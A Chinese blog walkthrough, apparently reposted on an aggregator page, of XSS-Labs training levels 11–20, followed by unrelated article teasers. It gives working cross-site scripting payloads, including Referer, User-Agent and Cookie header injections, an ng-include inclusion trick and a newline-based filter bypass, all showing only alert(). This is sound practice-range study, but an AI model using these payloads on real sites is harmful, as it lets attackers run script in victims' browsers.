当前位置：首页 > news >正文

《XSS-Labs》02. Level 11~20

news 文章来源：https://blog.csdn.net/KeepPromise/article/details/133518716 2025/1/12 23:13:22

XSS-Labs

索引
Level-11
- 题解
Level-12
- 题解
Level-13
- 题解
Level-14
- 题解
Level-15
- 题解
Level-16
- 题解
Level-17
- 题解
Level-18~20
- 题解

靶场部署在 VMware - Win7。

靶场地址：https://github.com/do0dl3/xss-labs

只要手动注入恶意 JavaScript 脚本成功，就可以证明 xss 漏洞存在。
最简单的验证方法：<script>alert("xss");</script>

索引

Level-11：Referer 头传递 payload。
Level-12：User-Agent 头传递 payload。
Level-13：Cookie 头传递 payload。
Level-14：图片 exif xss 漏洞。
Level-15：ng-include 利用。
Level-16：换行（%0a）代替空格绕过。
Level-17：flash 插件与 embed 标签。
Level-18 ~ 20：flash 插件相关 xss 漏洞。

Level-11

题解

先看看网页源码。

在这里插入图片描述

<input> 标签有四个值，都做了隐藏处理。其中第四个名为 t_ref 的标签是 http 头中 referer 的参数。

先 GET 与 POST 传参测试一下前三个标签能不能传值。

GET：

url + ?t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()> &#106;

POST：

t_link=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_history=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>&t_sort=" sRc DaTa OnFocus <sCriPt> <a hReF=javascript:alert()>

结果是都不能赋值。那就只能通过 referer 头传递 payload。

Referer: " οnfοcus=javascript:alert() type="text

在这里插入图片描述

Level-12

题解

看一眼源码。一眼 User-Agent 头。

在这里插入图片描述

那就直接上 payload。

User-Agent: " οnfοcus=javascript:alert() type="text

在这里插入图片描述

Level-13

题解

与 Level-11 和 Level-12 类似。利用 Cookie 头构造 payload。

Cookie: user=" οnclick=alert() type="text

在这里插入图片描述

Level-14

题解

这题会定时转跳到一个已经挂了的网站。

看了其他文章，有关图片 exif xss 漏洞。反正这题是没法做了，了解一下即可。

《xss-labs靶场-第十四关 iframe和exif xss漏洞》：
https://www.freebuf.com/articles/web/282983.html

《XSS挑战之旅–游戏通关攻略》：
https://xz.aliyun.com/t/1206?accounttraceid=74ab404d-2a01-4a1c-8b87-36ad367dbe11#toc-12

Level-15

在这里插入图片描述

题解

查看源码，可以看到传递的参数在代码中的位置。

在这里插入图片描述

ng-include：就是文件包含的意思，用来包含外部文件，如果包含的内容是地址，需要加引号。可以无视 html 实体化。

包含第一关看看，这里根据实际路径进行更改。

url + ?src='/lab/xss/level1.php'

在这里插入图片描述

所以可以包含之前的一关并对其传参来进行 xss。

这里不能包含直接弹窗的代码，如 <script>，但是可以利用能间接弹窗的代码，比如 <a>、<input>、<img>、<p> 标签等。

payload：

url + ?src='/lab/xss/level1.php?name=<img src=level15.png οnmοuseοver=alert()>'

Level-16

题解

先测试一下关键字：

url + ?keyword=" ' sRc DaTa OnFocus OnmOuseOver OnMouseDoWn P <sCriPt> <a hReF=javascript:alert()> &#106;

在这里插入图片描述

过滤了很多东西，【/】也被过滤了，空格也被 html 实体化。

不过可以使用回车换行（%0a）代替空格。

payload：

url + ?keyword=<svg%0Aonload=alert(1)>

Level-17

题解

这题主要考察 flash。需要使用支持 flash 插件的浏览器。也考察 embed 标签。

解题方法没什么新颖的。

可以参考：

《xss-labs靶场实战全通关详细过程》：
https://blog.csdn.net/l2872253606/article/details/125638898

Level-18~20

题解

没想到最后几关都是有关 flash 插件的，甚至还涉及反汇编…

直接参考大佬文章吧，毕竟 flash 插件可以认为是过时了…

《xss-labs靶场实战全通关详细过程》：
https://blog.csdn.net/l2872253606/article/details/125638898

Adobe 公司宣布将于 2020 年停止支持 Flash Player，因为 Flash 插件存在许多安全漏洞和缺陷，对于计算机和浏览器存在潜在的安全风险。
大多数现代浏览器已经默认禁用了 Flash 插件。

若问相思甚了期，除非相见时。

——《长相思》（宋）晏几道

《XSS-Labs》02. Level 11~20

XSS-Labs 索引Level-11题解 Level-12题解 Level-13题解 Level-14题解 Level-15题解 Level-16题解 Level-17题解 Level-18~20题解靶场部署在 VMware - Win7。靶场地址：https://github.com/do0dl3/xss-labs 只要手动注入恶意 JavaScript 脚本成功，就可以…...

编程日记 2023/10/4 10:49:43

Java中处理千万级数据的最佳实践：性能优化指南

在今天的数字化时代，处理大规模数据已经成为许多Java应用程序的核心任务。无论您是构建数据分析工具、实现实时监控系统，还是处理大规模日志文件，性能优化都是确保应用程序能够高效运行的关键因素。本指南将介绍一系列最佳实践，帮…...

编程日记 2023/10/4 10:47:41

LCR 069.山峰数组的峰顶索引

题目来源： leetcode题目，网址：LCR 069. 山脉数组的峰顶索引 - 力扣（LeetCode） 解题思路： 二分查找即可。解题代码： class Solution {public int peakIndexInMountainArray(int[] arr) {…...

编程日记 2023/10/4 10:44:38

AtCoder Beginner Contest 233 (A-Ex)

A.根据题意模拟即可 B.根据题意模拟即可 C.直接用map 进行dp即可 D.用前缀和进行模拟，用map统计前缀和，每次计算当前前缀和-k的个数就是以当前点为右端点答案。 E - Σ[k0..10^100]floor(X／10^k) (atcoder.jp) （1）…...

编程日记 2023/10/4 10:43:38

解决caffe中的python环境安装的问题

由于caffe（GitHub - BVLC/caffe: Caffe: a fast open framework for deep learning.）使用的python版本是2.7，而非python3，所以安装的时候使用命令：sudo apt install python2.7进行安装。而在安装python的各种包时&am…...

编程日记 2023/10/4 10:42:37

专业图像处理软件DxO PhotoLab 7 mac中文特点和功能

DxO PhotoLab 7 mac是一款专业的图像处理软件，它为摄影师和摄影爱好者提供了强大而全面的照片处理和编辑功能。 DxO PhotoLab 7 mac软件特点和功能强大的RAW和JPEG格式处理能力：DxO PhotoLab 7可以处理来自各种相机的RAW格式图像，包括佳能、…...

编程日记 2023/10/4 10:41:36

面试题：Kafka 为什么会丢消息？

文章目录 1、如何知道有消息丢失？2、哪些环节可能丢消息？3、如何确保消息不丢失？ 引入 MQ 消息中间件最直接的目的：系统解耦以及流量控制（削峰填谷） 系统解耦： 上下游系统之间的通信相互依赖&a…...

编程日记 2023/10/4 10:39:34

WSL安装异常：WslRegisterDistribution failed with error: 0xc03a001a

简介：如果文件夹右上角是否都有两个相对的蓝色箭头，在进行安装wsl时，设置就会抛出 Installing WslRegisterDistribution failed with error: 0xc03a001a的异常历史攻略： 卸载WSL WSL：运行Linux文件 WSL&#xff1…...

编程日记 2023/10/4 10:38:32

【C语言模拟实现strcmp函数】

C语言程序设计笔记---025 C语言之模拟实现strcmp函数1、介绍strcmp函数2、模拟实现strcmp函数3、结语 C语言之模拟实现strcmp函数前言： 通过C语言字符串函数的知识，这篇将对strcmp函数进行深入学习底层原理的知识，并模拟实现对应功能。 /知…...

编程日记 2023/10/4 10:37:32

maven 依赖版本冲突异常

maven 依赖版本冲突异常好巧不巧，前几天刚刚复习完 maven 的内容今天就碰到 maven 报错。起因是这样的，项目马上快要上线了，在上线之前需要跑一些 audit 去检查项目是否安全（这里主要是 outdated 的依赖检查）。总体…...

编程日记 2023/10/4 10:33:28

蓝牙核心规范（V5.4）11.5-LE Audio 笔记之Context Type

专栏汇总网址：蓝牙篇之蓝牙核心规范学习笔记（V5.4）汇总_蓝牙核心规范中文版_心跳包的博客-CSDN博客爬虫网站无德，任何非CSDN看到的这篇文章都是盗版网站，你也看不全。认准原始网址。！！！蓝牙中的上下文类型（Context Type）是用于描述音频流当前使用情况或相关使用情…...

编程日记 2023/10/4 10:31:27

【Linux】RPM包使用详解

🍁 博主 "开着拖拉机回家"带您 Go to New World.✨🍁 🦄 个人主页——🎐开着拖拉机回家_大数据运维-CSDN博客 🎐✨🍁 🪁🍁 希望本文能够给您带来一定的帮助🌸文…...

编程日记 2023/10/4 10:30:25

勒索病毒最新变种.Elbie勒索病毒来袭，如何恢复受感染的数据？

引言： 网络犯罪正变得越来越隐秘和危险。其中，.Elbie勒索病毒作为数字犯罪的一部分，以其阴险和复杂性而备受关注。本文将带您深入探索.Elbie勒索病毒的工作原理和如何应对这一数字迷宫。如果受感染的数据确实有恢复的价值与必要性&#xff0…...

编程日记 2023/10/4 10:28:22

ArduPilot开源飞控之AP_Mission 1. 源由2. AP_Mission类3 简令结构3.1 导航相关3.1.1 jump command3.1.2 condition delay command3.1.3 condition distance command3.1.4 condition yaw command3.1.5 change speed command3.1.6 nav guided command3.1.7 do VTOL transition3.…...

编程日记 2023/10/4 10:24:19

JVM111

JVM1 字节码与多语言混合编程字节码我们平时说的java字节码， 指的是用java语言编译成的字节码。准确的说任何能在jvm平台上执行的字节码格式都是一样的。所以应该统称为:jvm字节码。不同的编译器，可以编译出相同的字节码文件，字节码文件…...

编程日记 2023/10/4 10:23:17

排序篇(三)----交换排序

排序篇(三)----交换排序 1.冒泡排序基本思想: 通过不断地比较相邻的元素，将较大的元素往后移动，从而实现排序的目的。具体的步骤如下： 从待排序的数组中选择相邻的两个元素进行比较，如果前一个元素大于后一个元素&#…...

编程日记 2023/10/4 10:22:16

React antd Table点击下一页后selectedRows丢失之前页选择内容的问题

一、问题使用了React antd 的<Table>标签，是这样记录选中的行id与行内容的： <TabledataSource{data.list}rowSelection{{selectedRowKeys: selectedIdsInSearchTab,onChange: this.onSelectChange,}} // 表格是否可复选，加 type: …...

编程日记 2023/10/4 10:21:15

蓝牙核心规范（V5.4）11.4-LE Audio 笔记之音频模型

专栏汇总网址：蓝牙篇之蓝牙核心规范学习笔记（V5.4）汇总_蓝牙核心规范中文版_心跳包的博客-CSDN博客爬虫网站无德，任何非CSDN看到的这篇文章都是盗版网站，你也看不全。认准原始网址。！！！从一开始，蓝牙低功耗（Bluetooth Low Energy，BLE）音频的开发就秉持着“以设…...

编程日记 2023/10/4 10:20:14

Spring Boot：利用JPA进行数据库的查删

目录标题 DAO 、Service 、 Controller 层控制器文件示例代码-单个查找查找成功示例代码-列表查找查找成功示例代码-删除删除成功 DAO 、Service 、 Controller 层 DAO 层负责数据库访问，它封装了对数据库的访问操作，例如查询、插入、更新和删除等。 Q…...

编程日记 2023/10/4 10:18:12

1711: 【穷举】满足条件的整数

题目描述假设a、b、c均为整数（1<a,b,c<100)，同时a<b，找出所有符合条件：a2 b2 n*c3的整数组。按a从小到大的顺序输出所有满足条件的整数组（若a相同，则按b从小到大的顺序输出） 输入…...

编程日记 2023/10/4 10:17:11

【数据结构】堆的应用-----TopK问题

目录一、前言二、Top-k问题 💦解法一：暴力排序 💦解法二：建立N个数的堆 💦解法三：建立K个数的堆（最优解） 三、完整代码和视图四、共勉一、前言在之前的文章中&#xff…...

编程日记 2023/10/4 10:16:07

QT之xml文件的读写

QT之xml文件的读写简介用法举例简介 QT的QDomDocument、QDomElement、QDomNode是Qt XML模块中的三个类，用于解析和操作XML文档。 1）QDomDocument类： QDomDocument类表示整个XML文档。它提供了解析XML文档的方法，如setContent(…...

编程日记 2023/10/4 10:15:06

C语言中的异常处理机制是什么？

C语言中的异常处理机制 C语言是一门强大而灵活的编程语言，它为程序员提供了广泛的控制权和自由度。然而，C语言本身并不提供像其他高级语言一样的内置异常处理机制，如Java中的try-catch或Python中的异常处理。因此，C语言程序员需要…...

编程日记 2023/10/4 10:14:06

Java中的并发编程模型和常用工具类

本文主要介绍了Java中的并发编程模型和常用工具类，首先阐述了并发编程的概念及其重要性，然后详细介绍了线程的基本概念、生命周期和状态转换、同步与互斥、死锁问题以及线程池的使用和实现原理。接着介绍了synchronized关键字和Lock接口的使用、原子变量…...

编程日记 2023/10/4 10:09:01

第10章 MySQL（一）

10.1 谈谈MySQL的架构难度：★★ 重点：★ 白话解析要想彻底的理解MySQL，它的架构一定要先弄清楚，当Java程序员通过JDBC或者Mybatis去执行一条SQL的时候，到底经历了什么。下边先看一幅图：户端：Java程序员通过JDBC或者Mybatis去拿MySQL的驱动程序，实际上就是拿客户端。…...

编程日记 2023/10/4 10:04:57

英飞凌 Tricore 架构中断系统详解

本文以TC3系列MCU为例，先来了解中断源是如何产生的，再看一下CPU是如何处理中断源的。 AURIX TC3XX的中断路由模块 Interrupt Router (IR) 在TC3中，中断既可以被CPU处理，也可以被DMA处理，所以手册中不再把中断称为中断…...

编程日记 2023/10/4 10:02:55

单例模式：饿汉式

单例模式全局仅一个实例，用于获取公共的内容头文件mglobalinfomgr.h class MGlobalInfoMgr {MGlobalInfoMgr();~MGlobalInfoMgr(); public:static MGlobalInfoMgr* GetInstance(); private:static MGlobalInfoMgr* _instance; }; 源文件mglobalinfomgr.cpp MGl…...

编程日记 2023/10/4 9:57:50

什么是视图

目录一、什么是视图二、视图的作用三、创建视图四、使用视图 1.使用视图查询员工信息五、注意事项六、补充一、什么是视图视图是基于查询的虚拟表，是一个逻辑表，本身并不包含数据。同真实的表一样，视图包含一系列带有名称的列…...

编程日记 2023/10/4 9:52:46

C++——list(2)

作者：几冬雪来时间：2023年9月28日内容：C——list内容讲解目录前言： list的const迭代器： const的iterator： const迭代器： operator->: 拷贝构造： 迭代器接口补充&…...

编程日记 2023/10/4 9:47:39

Django基础讲解-路由控制器和视图（Django-02）

一路由控制器参考链接： Django源码阅读：路由（二） - 知乎 Route路由, 是一种映射关系！路由是把客户端请求的 url路径与视图进行绑定映射的一种关系。这个/timer通过路由控制器最终匹配到myapp.views中的视图函数 …...

编程日记 2023/10/4 9:46:38

学习做网站多久/百度开车关键词

今天干了件很蠢的事情~.. 想要将a电影.srt 改成跟电影.avi 同名字.于是就下了mv a电影.srt 电影.avi ... 当按下enter 时清醒了过来...发现到那avi 已经被我清掉了.. 变srt 了... :~于是就有这篇文章的由来.... 呜... :~虽然是写说档案删除的回复救援, 但事实上我没有成功救回来…...

编程日记 2025/1/12 19:16:39

久久建筑网下载插件怎么下载净水器/谷歌优化是什么意思

目录dlib与opencv安装Ⅰ-提取人脸特征Ⅱ-在眼睛处绘制黑色的实心圆（伪墨镜）小结链接dlib与opencv Dlib 是一个十分优秀好用的机器学习库，其源码均由 C 实现，并提供了 Python 接口，可广泛适用于很多场景. 这里主要记录 …...

编程日记 2025/1/12 17:20:31

知名商城网站建设/游戏代理平台有哪些

刊号 # 20 - Aug 11, 2008 项目新闻开始JavaFX 技术跟随这个教程开始JavaFX技术,它涵盖了怎样下载和安装支持JavaFX的NetBeans IDE.它也包括了怎么样启动这个IDE和运行一个示例程序. 下载JavaFX Preview SDK JavaFX Preview SDK 是JavaFX 平台的预览版本.针对网页脚本编辑和早…...

编程日记 2025/1/12 15:35:53

西安做网站程序/搜索引擎排名查询

Django模型Django 对各种数据库提供了很好的支持，包括：PostgreSQL、MySQL、SQLite、Oracle。 Django 为这些数据库提供了统一的调用API。我们可以根据自己业务需求选择不同的数据库。 MySQL 是 Web 应用中最常用的数据库。本章节我们将以 Mysql 作为实例…...

编程日记 2025/1/12 15:07:34

重庆本地建站/郑州seo外包阿亮

1.首先你要有一个github账号,如果没有的话,登录网址注册：https://github.com/ 2.进入你的github 点击右上角的号选择 New repository 3.取一个Repository name，不能和自己的其他项目冲突 PS：Repository name: 仓库名称Description(可选…...

编程日记 2025/1/12 5:19:09

网站建设运营方案/域名停靠网页推广大全2021

实战需求 SwiftUI 制作个音乐播放器本文价值与收获看完本文后，您将能够作出下面的界面截屏2020-08-18 下午3.59.50.png看完本文您将掌握的技能...

编程日记 2025/1/12 4:57:55

XSS-Labs

索引

Level-11

题解

Level-12

题解

Level-13

题解

Level-14

题解

Level-15

题解

Level-16

题解

Level-17

题解

Level-18~20

题解

相关文章：